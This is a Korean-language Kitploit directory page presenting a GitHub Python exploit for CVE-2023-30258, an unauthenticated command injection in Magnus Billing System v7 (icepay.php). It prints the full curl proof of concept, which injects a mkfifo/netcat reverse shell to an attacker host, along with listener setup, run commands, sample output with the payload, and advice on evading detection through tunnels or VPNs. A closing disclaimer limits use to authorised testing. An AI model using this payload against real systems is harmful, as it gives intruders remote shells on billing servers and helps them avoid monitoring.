Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit — CVE-2023-30258을 위한 자동화된 파이썬 익스플로잇, Magnus Billing System v7의 명령어 삽입 취약점입니다. 조작된 GET 요청을 icepay.php에 보내어 임의의 명령을 실행하고 리버스 셸을 설정합니다. | Kitploit
도구/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258을 위한 자동화된 파이썬 익스플로잇, Magnus Billing System v7의 명령어 삽입 취약점입니다. 조작된 GET 요청을 icepay.php에 보내어 임의의 명령을 실행하고 리버스 셸을 설정합니다.

저장소 보기
711년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Magnus Billing System v7 익스플로잇

이 Python 스크립트는 Magnus Billing System v7의 명령 주입 취약점, 특히 /mbilling/lib/icepay/icepay.php에 위치한 icepay.php 스크립트에서의 익스플로잇을 자동화합니다. 이 익스플로잇은 democ 파라미터를 활용하여 대상 시스템에서 임의의 명령을 실행하고, 궁극적으로 공격자가 제어하는 시스템으로 리버스 셸을 설정합니다.

취약점 개요

이 취약점은 조작된 GET 요청을 통해 인증 없이 명령 주입을 허용합니다. 원래 개념 증명(PoC)은 다음 curl 명령을 사용했습니다:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

이 스크립트는 해당 과정을 자동화하며, 명령줄 인수를 통해 설정 가능합니다.

기능

  • 설정 가능: 명령줄 인수를 통해 대상 IP, 공격자 IP 및 포트를 지정할 수 있습니다.
  • 간단함: requests 라이브러리를 사용하여 페이로드와 함께 HTTP 요청을 전송합니다.
  • 피드백: 익스플로잇 진행 상황을 추적할 수 있도록 명확한 출력을 제공합니다.
  • 전제 조건

    • Python 3.x: 시스템에 Python 3이 설치되어 있는지 확인하세요.
    • Requests 라이브러리: requests Python 모듈을 설치하세요:
      root@kitploit:~
      pip install requests
      
    • Netcat: 리버스 셸이 작동하려면 대상 시스템에 netcat(nc)이 설치되어 있어야 합니다.
    • 리스너: 리버스 셸을 수신하기 위해 공격자 시스템에서 netcat 리스너를 설정하세요.
    • 취약한 대상: 대상은 취약한 icepay.php 스크립트에 접근 가능한 Magnus Billing System v7이 실행 중이어야 합니다.

    사용법

    설정

    1. 클론 또는 다운로드: 스크립트를 exploit.py로 저장하세요.
    2. 리스너 설정: 공격자 시스템에서 netcat 리스너를 시작하세요:
      root@kitploit:~
      nc -lvnp <PORT>
      
      <PORT>를 선택한 포트(예: 443)로 바꾸세요.

    익스플로잇 실행

    root@kitploit:~
    python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
    

    매개변수:

    • -t, --target: 대상 Magnus Billing System의 IP 주소
    • -a, --attacker: 리버스 셸을 수신할 사용자의 IP 주소
    • -p, --port: 리버스 셸을 위한 사용자 시스템의 포트

    예시

    root@kitploit:~
    python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
    

    예상 출력:

    root@kitploit:~
    === Magnus Billing System v7 Exploit ===
    Command Injection via icepay.php - Reverse Shell
    =======================================
    [+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
    [+] Attacker: 10.8.64.79:443
    [+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
    [+] Request sent successfully!
    [*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
    
    1. 셸 획득: 성공하면 netcat 리스너로 전환하여 리버스 셸과 상호작용하세요.

    기술 참고 사항

    • 페이로드 유형: 이 스크립트는 netcat과 함께 FIFO 기반 리버스 셸(mkfifo)을 사용합니다.
    • 오류 처리: 네트워크 오류 및 잘못된 포트에 대한 기본 검사가 포함되어 있습니다.
    • 디버깅: 서버 응답을 확인하려면 exploit() 함수에서 print(response.text)의 주석을 해제하세요.
    • 대체 페이로드: 필요한 경우 다른 리버스 셸 페이로드를 사용하도록 스크립트를 수정할 수 있습니다.

    문제 해결

    • 연결이 실패하면 다음 사항을 확인하세요:
      • 대상 시스템에 netcat이 설치되어 있는지
      • 방화벽이 연결을 차단하고 있지 않은지
      • 올바른 포트가 사용되고 있는지
      • 대상이 패치되지 않았는지

    보안 고려 사항

    • 탐지를 피하기 위해 이 익스플로잇을 사용할 때 SSH 터널링 또는 VPN을 사용하는 것을 고려하세요.
    • 페이로드가 보안 모니터링 시스템을 트리거할 수 있습니다.

    면책 조항

    이 도구는 교육 및 보안 테스트 목적으로만 제공됩니다. 테스트할 명시적 권한이 있는 시스템에서만 사용하세요. 소유하지 않거나 테스트 동의를 받지 않은 시스템에 대한 무단 사용은 불법적이고 비윤리적입니다. 작성자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

    라이선스

    이 프로젝트는 MIT 라이선스 하에 배포됩니다. 필요에 따라 면책 조항을 유지한 채로 수정 및 배포할 수 있습니다.

    기여

    기여, 버그 신고 및 기능 요청을 환영합니다. 자유롭게 풀 리퀘스트를 제출하거나 이슈를 열어 주세요.

    도구 다운로드